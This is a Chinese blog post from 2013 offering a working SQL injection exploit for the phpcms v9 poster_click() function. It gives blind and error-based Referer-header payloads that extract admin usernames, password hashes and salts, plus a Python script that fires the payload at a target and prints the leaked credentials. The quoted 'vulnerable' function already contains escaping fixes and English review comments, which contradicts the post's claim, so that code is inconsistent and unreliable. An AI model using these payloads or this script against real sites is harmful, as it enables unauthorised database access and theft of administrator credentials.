
phpcms v9 poster_click 注入 0day 利用代码

发表于 2013-1-11 21:01:00
有人放出了 phpcms v9 的 0day，就随手写了个利用代码。注入点是 poster_click() 把 Referer 头原样拼进 INSERT 语句，注入代码有两种形式：

问题函数：\phpcms\modules\poster\index.php 中的 poster_click()
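public function poster_click() {
	// Counts a click on poster $_GET['id'] and redirects the visitor to the
	// poster's link.  Every input used here is attacker-controlled (query
	// string, Referer header, cookie), so each one is constrained before it
	// reaches SQL or the Location header.
	$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
	$r = $this->db->get_one(array('id'=>$id));
	if (!is_array($r) && empty($r)) return false;
	$ip_area = pc_base::load_sys_class('ip_area');
	$ip = ip();
	$area = $ip_area->get($ip);
	// NOTE(review): param::get_cookie() is not shown here; confirm that what
	// it returns is safe to hand to s_db->insert() without further escaping.
	$username = param::get_cookie('username') ? param::get_cookie('username') : '';
	if($id) {
		$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
		// HTTP_REFERER used to be stored verbatim and s_db->insert() does not
		// escape it, so a single quote in the Referer header closed the value
		// and the rest of the header ran as SQL (the payloads on this page).
		// Escape it before the insert.  addslashes() stops the quote-based
		// injection but is bypassable with multibyte sequences if the
		// connection charset is GBK; the db layer's own escape or parameter
		// binding is the better fix if s_db offers one.
		$referer = addslashes((string) HTTP_REFERER);
		$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>$referer, 'clicktime'=>SYS_TIME, 'type'=> 1));
	}
	$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
	$setting = string2array($r['setting']);
	// Only the poster's own configured link targets may be redirect
	// destinations.  Previously any $_GET['url'] was accepted for multi-link
	// posters, i.e. an open redirect.
	$allowed = array();
	foreach ((array) $setting as $item) {
		if (is_array($item) && isset($item['linkurl'])) $allowed[] = $item['linkurl'];
	}
	$url = isset($setting['1']['linkurl']) ? $setting['1']['linkurl'] : '';
	if (count($setting) != 1 && isset($_GET['url']) && in_array($_GET['url'], $allowed, true)) {
		// Multi-link poster: the client may say which configured link it
		// clicked, but nothing outside that list.
		$url = $_GET['url'];
	}
	header('Location: '.$url);
}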

利用方式：

1、可以采用盲注入的手法（Referer 头的值如下）：
Referer: 1',(select password from v9_admin where userid=1 and substr(password,1,4)='xxoo'),'1')#
通过返回页面是否正常，逐段猜解密码字段（上例猜的是前 4 位；逐位猜解时用 substr(password,位置,1) 比较）。

2、代码是花开写的，随手附上了（同样放在 Referer 头里）：

1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#
此方法是报错注入手法（count(*) 加 floor(rand(0)*2) 配合 group by 触发主键冲突，把数据带进 “Duplicate entry” 错误信息），原理自查。注意：v9_admin 有多条记录时子查询会报 “Subquery returns more than 1 row” 而不会泄露数据，需加 limit 1；目标关闭了错误显示时此法也拿不到数据。
利用程序：

#!/usr/bin/env python
import re
import sys

try:
    import httplib  # Python 2
except ImportError:  # Python 3 renamed the module
    import http.client as httplib

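def attack(host=None, path=None, poster_id=2):
    """Probe one phpcms v9 install for the poster_click Referer SQL injection.

    Sends a single GET to ``<path>/index.php?m=poster&c=index&a=poster_click``
    with the error-based payload in the ``Referer`` header and prints the
    first ``Duplicate entry '...'`` fragment of the response, which is where
    MySQL echoes ``username_password_encrypt`` from ``v9_admin``.

    Args:
        host: target ``host[:port]`` (no scheme; it is passed straight to
            ``httplib.HTTPConnection``).  Defaults to ``sys.argv[1]``.
        path: install prefix such as ``/`` or ``/phpcmsv9/``.  Defaults to
            ``sys.argv[2]``.
        poster_id: id of an existing poster; poster_click() returns before the
            vulnerable INSERT when the id does not exist, so the default of 2
            is only a guess.

    Returns:
        The matched ``Duplicate entry '...'`` string, or ``None`` when the
        response carries no such error (patched target, error display off,
        wrong path/id, or more than one admin row).

    Only run this against systems you are authorised to test.
    """
    print("Code by Pax.Mac Team conqu3r!")
    print("Welcome to our zone!!!")
    if host is None:
        host = sys.argv[1]
    if path is None:
        path = sys.argv[2]
    # The Referer value lands unescaped in poster_click()'s INSERT: the leading
    # quote closes the referer column and the rest becomes SQL.  The
    # rand(0)/group-by trick forces a duplicate-key error whose message carries
    # the selected data.  The inner SELECT must yield exactly one row; with
    # several admins MySQL reports "Subquery returns more than 1 row" instead.
    payload = ("1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),"
               "(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin"
               " WHERE 1 ))a from information_schema.tables group by a)b),'1')#")
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5",
        "Accept": "text/plain",
        "Referer": payload,
    }
    target = ("%s/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=%d"
              % (path.rstrip("/"), poster_id))
    conn = httplib.HTTPConnection(host)
    try:
        conn.request("GET", target, headers=headers)
        body = conn.getresponse().read()
    finally:
        # Close even when the request raises, so a failed probe leaks no socket.
        conn.close()
    # Python 3 returns bytes; on Python 2 str.decode() yields unicode.  Either
    # way the regex below runs on text.
    body = body.decode("utf-8", "replace")
    leaked = re.findall(r"Duplicate entry '\w+'", body)
    if not leaked:
        # The original indexed [0] unconditionally and died with IndexError
        # on a non-vulnerable target.
        print("No 'Duplicate entry' error in the response: target is patched, "
              "error display is off, or host/path/id is wrong.")
        return None
    print(leaked[0])
    return leaked[0]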
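if __name__ == "__main__":
    # argv[1] is host[:port] with no scheme (it goes to HTTPConnection);
    # argv[2] is the phpcms install prefix, e.g. "/" or "/phpcmsv9/".
    if len(sys.argv) < 3:
        print("Code by Pax.Mac Team conqu3r")
        print("Usage:")
        print("    phpcmsattack.py   www.paxmac.org /")
        print("    phpcmsattack.py   www.paxmac.org /phpcmsv9/")
        sys.exit(1)
    attack()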